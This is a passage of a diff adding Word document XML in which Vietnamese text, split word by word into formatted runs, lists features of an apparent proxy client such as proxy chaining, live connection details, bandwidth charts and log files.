+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>của</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>bạn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>Làm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>việc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>thông</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> qua </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>một</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>loạt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>các</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>máy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>chủ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> proxy </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>sử</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>dụng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>các</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>giao</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>thức</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>khác</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>nhau</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>Xem</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>thông</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tin </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>về</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>các</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>kết</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>nối</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>hiện</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>thời</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>địa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>chỉ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>tốc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>độ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>truyền</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>dữ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>liệu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>thời</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>gian</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>kết</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>nối</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, v.v.) </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>theo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>thời</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>gian</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>thực</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>Xem</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>thông</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tin </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>sử</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>dụng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>băng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>theo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>thời</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>gian</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>thực</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>thông</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>dưới</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>dạng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>sơ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>đồ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>màu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>Duy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>trì</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>các</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>tập</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tin </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>nhật</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>ký</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>Ghi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>lại</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>lưu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>lượng</w:t>
